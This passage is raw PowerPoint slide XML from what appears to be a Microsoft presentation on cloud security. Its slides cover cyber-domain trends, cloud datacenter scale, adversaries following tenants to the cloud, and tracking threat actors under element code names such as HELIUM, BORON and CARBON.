              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defenders harnessing new capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346891" lvl="1" indent="-346891" defTabSz="932563">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some skillsets finding new life in cyber</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274639" y="29527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Three Interacting Trends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Rectangle 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3115936" y="1237926"/>
            <a:ext cx="4184426" cy="1841506"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="111010" tIns="55505" rIns="111010" bIns="55505">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="soft" dir="t">
                <a:rot lat="0" lon="0" rev="10800000"/>
              </a:lightRig>
            </a:scene3d>
            <a:sp3d>
              <a:bevelT w="27940" h="12700"/>
              <a:contourClr>
                <a:srgbClr val="DDDDDD"/>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932563"/>
            <a:r>
              <a:rPr lang="en-US" sz="3599" b="1" kern="0" spc="150" dirty="0">
                <a:ln w="11430"/>
                <a:solidFill>
                  <a:srgbClr val="F8F8F8"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="25400" algn="tl" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>The Race for the Mastery of the Cyber Domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Freeform 28"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="6983394" flipH="1">
            <a:off x="678774" y="1231125"/>
            <a:ext cx="2358587" cy="1855108"/>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FFC000"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="152400" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1462700" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1599" kern="0" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFFFFF">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="FFFFFF">
                      <a:lumMod val="85000"/>
                      <a:lumOff val="15000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:path path="circle">
                  <a:fillToRect r="100000" b="100000"/>
                </a:path>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="131" name="Group 130"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9263147" y="718350"/>
            <a:ext cx="2901056" cy="5611661"/>
            <a:chOff x="9263147" y="718350"/>
            <a:chExt cx="2901056" cy="5611661"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="121" name="Rounded Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="9263147" y="718350"/>
              <a:ext cx="2901056" cy="5611661"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="25000"/>
                <a:lumOff val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="none" w="med" len="med"/>
            </a:ln>
            <a:scene3d>
              <a:camera prst="perspectiveRigh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11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9506740" y="2278062"/>
              <a:ext cx="2609136" cy="4001095"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>200+ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light"/>
                </a:rPr>
                <a:t>cloud services</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="0" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1+ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light"/>
                </a:rPr>
                <a:t>million servers</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="0" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="0" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2800" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Light"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>100+ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light"/>
                </a:rPr>
                <a:t>datacenters in global cloud portfolio</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>$15B+ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:sysClr val="windowText" lastClr="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Segoe UI Light"/>
                </a:rPr>
                <a:t>infrastructure investment </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="124" name="Picture 123"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9603344" y="2719268"/>
              <a:ext cx="1043953" cy="720328"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="125" name="Picture 124"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10804435" y="1560673"/>
              <a:ext cx="1119688" cy="790579"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="126" name="Picture 125"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9435776" y="1116185"/>
              <a:ext cx="1342119" cy="867215"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="128" name="Picture 127"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10788549" y="745185"/>
              <a:ext cx="1216238" cy="799564"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="129" name="Picture 3" descr="C:\Users\Public\Documents\Microsoft\Events\Architect Council\Chicago-Inside-Container-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2317" y="3847055"/>
              <a:ext cx="1564235" cy="1116865"/>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9"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="10858100" y="2681206"/>
              <a:ext cx="1077136" cy="760534"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1767791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Tenants bring their adversaries with them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adversaries follow their targets from on-prem to the cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Customers may not be used to threats that they see in the cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Innovate in defense by harnessing economic trends</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hyperscale cloud investments dropping costs in compute, storage, networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store richer data, from more layers, for longer and process it with richer algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can use the cloud to protect itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attack on one tenant protects all tenants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud services can protect each other</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cyber &amp; Cloud Providers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2007776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Tenants bring their adversaries with them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1234688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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracking Adversaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="607011" y="1397006"/>
            <a:ext cx="914270" cy="992591"/>
            <a:chOff x="815364" y="1333373"/>
            <a:chExt cx="914400" cy="992732"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="815364" y="1333373"/>
              <a:ext cx="914400" cy="992732"/>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 name="Picture 5" descr="http://www.secureworks.com/Cyber_Threat_Intelligence.jp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17" y="1545806"/>
              <a:ext cx="587375" cy="57613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732615" y="1017497"/>
            <a:ext cx="2040504" cy="376684"/>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Actor Code Name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1623802" y="2523988"/>
            <a:ext cx="1231663" cy="1017044"/>
            <a:chOff x="-4488013" y="4593064"/>
            <a:chExt cx="1201703" cy="1017188"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-4488013" y="4593064"/>
              <a:ext cx="1182136" cy="1017188"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>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TextBox 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-4381402" y="4612053"/>
              <a:ext cx="958739" cy="753345"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>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4799" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                </a:rPr>
                <a:t>He</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-4488012" y="5240920"/>
              <a:ext cx="1201702" cy="345212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>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prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                </a:rPr>
                <a:t>HELIUM</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1620047" y="1397005"/>
            <a:ext cx="1215363" cy="1017044"/>
            <a:chOff x="-3154915" y="4593064"/>
            <a:chExt cx="1182136" cy="1017188"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rectangle 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3154915" y="4593064"/>
              <a:ext cx="1182136" cy="1017188"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009E49"/>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TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3054703" y="4612053"/>
              <a:ext cx="958739" cy="753345"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>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4799" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3105768" y="5240293"/>
              <a:ext cx="1065089" cy="345212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>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prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                </a:rPr>
                <a:t>BORON</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1635736" y="3657599"/>
            <a:ext cx="1219730" cy="1017044"/>
            <a:chOff x="-1873687" y="4598139"/>
            <a:chExt cx="1198635" cy="1017188"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1873687" y="4598139"/>
              <a:ext cx="1182136" cy="1017188"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>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TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1779011" y="4617128"/>
              <a:ext cx="958739" cy="753345"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>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4799" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                </a:rPr>
                <a:t>C</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="TextBox 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1848975" y="5245995"/>
              <a:ext cx="1173923" cy="345212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>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prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                </a:rPr>
                <a:t>CARBON</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1645280" y="4788488"/>
            <a:ext cx="1255942" cy="1017044"/>
            <a:chOff x="-3272749" y="5859382"/>
            <a:chExt cx="1231618" cy="1017188"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Rectangle 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3269490" y="5859382"/>
              <a:ext cx="1182136" cy="1017188"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="75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ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="TextBox 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3135349" y="5878371"/>
              <a:ext cx="958739" cy="753345"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>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4799" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                </a:rPr>
                <a:t>Sc</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="4799" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
